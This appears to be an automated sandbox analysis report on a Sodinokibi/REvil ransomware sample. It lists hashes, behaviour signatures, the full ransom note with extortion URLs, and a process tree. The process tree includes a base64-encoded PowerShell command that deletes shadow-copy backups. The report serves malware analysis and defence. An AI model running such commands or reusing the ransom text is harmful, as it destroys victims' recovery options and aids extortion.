Analysis

  • max time kernel
    155s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    25-06-2022 11:53

General

  • Target

    3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe

  • Size

    181KB

  • MD5

    e4b1080192b24298d08227ccbab1a24b

  • SHA1

    e96a57d26930d96c7e3a2964fc1ede83e6bae4f1

  • SHA256

    3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86

  • SHA512

    345be5d595d2f0ccef1977e9263dfdcc6773195becb84d9786e4868cf5a30a6a71c37aac9f4e1db4b8bdea7aafb5fa4cc909e0ad54f0f8cf198be8c27f75b37d

Score
10/10

Malware Config

Extracted

Path

C:\crbi5bgbk-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension crbi5bgbk. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FE14E7541D09A399 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/FE14E7541D09A399 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: u9s7O/RAQpLi3NXe7yprkrNAvmX0PDXXNEVCcE0zzNnaP/NkuRyXC2G195AMDPxb GI2pHOQF1B1LJbPo5SsZZFSp7Vkdeqr9GBuW2mwae141GXbzs5zgwVk8DyRsJV+M y75obo4SaPLI713Xxr2737MmVDGxEtjhL2yUKuVeS+qtOwadPMH9KBWHA1zsaoAD +Fzfjj9qUZkmmkSVCbOMihqyDDD79N4UyxVGO+2sRoxh3YmAMMbWn6PBlf4f0xmy QjAKwuXic20tK+muDpdIh2YAZlREG1QvcC77baNkmFH6EKSGIUpKX8ASyUIksMgF NqO4vdNeVn3JfAYO+9G/UNlq8W8KfNEJwy/I+1Zy7+7nlkA6OUhkyZqThEbndBxA DZ4QwUmI6gJlK/R+uRYkjjQuuD3w7pGgGvv1P0Dk6ByA/A/Rx3iBzhc8YFywx0CJ 3iMFqXJsw5GMD8fWLBLZcwRjo3669cM7dZVjAl8b59CwoeEr83q+VePl4E2rIO28 vdBwLa0KM7r58UdI+wsDstW825si8ABjHrMJb+8Jttfap0uiG2l48gFWk1AuQiX5 0zN7mai/n6q4p/DQRSWr0NGxR7GxHTmKmPoqTMV5XLipqpjopLYYgExoV3Zj8iP7 NDKdzqoNmVjFQp41Mtx7e2xpKMX4h+4aSNJKK8eBqcvyzw6DAhJVWoxXskiGtqZt UICa8RwhsEJtTgeE3kyozFx4u30X0fcNkJXFaKxwRk1GHKrNhtcjyvHhYvL5lH1G SVbFdZ4XMCOdgvOi6U9e9VrlgVnVcPRs3wi5eapWyldCEDnWZJYEhj5IfNFjLa+N bYl70M6nCmAVIJhISCjgUf24xfbZUtbL5S/cmBOQzEBbU+JUGkNUSaJYtdgnM+SM i0dPPCcZJE0Id96CJWvZ7gU4GrPcjZLKVDrXSGk9i8UdCSdeTTC5Rj8JIQd4U2Lg ggYURO5v1vuNrc5E0DRng20jJ/fu47SSc7AtI7gQoxmZuVs3qZXCI+6LZwe3Ws7z BxC/MvPuaijlfdTpUj6W1b9UiwSMEe8XFKe/J3QGVfFD2Dv4FzWpjM4SCKxOYUP8 lteVzRsHqc7Bnoszsk5WHwa7T6FS1y5hTtDpKdub8MM2ZKfupPRUO6SA0GozcR4x smnOqzEDXkZYyDPVZ00U/A== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FE14E7541D09A399

http://decryptor.top/FE14E7541D09A399

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe
    "C:\Users\Admin\AppData\Local\Temp\3941c070f3e2c50b70939d8bd2a792a71c93f9d24d487c74714601b34240ed86.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1712
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1404
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1012

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1712-130-0x0000000000000000-mapping.dmp

    • memory/1712-131-0x000001D721300000-0x000001D721322000-memory.dmp

      Filesize

      136KB

    • memory/1712-132-0x00007FFE091A0000-0x00007FFE09C61000-memory.dmp

      Filesize

      10.8MB

    • memory/1712-133-0x00007FFE091A0000-0x00007FFE09C61000-memory.dmp

      Filesize

      10.8MB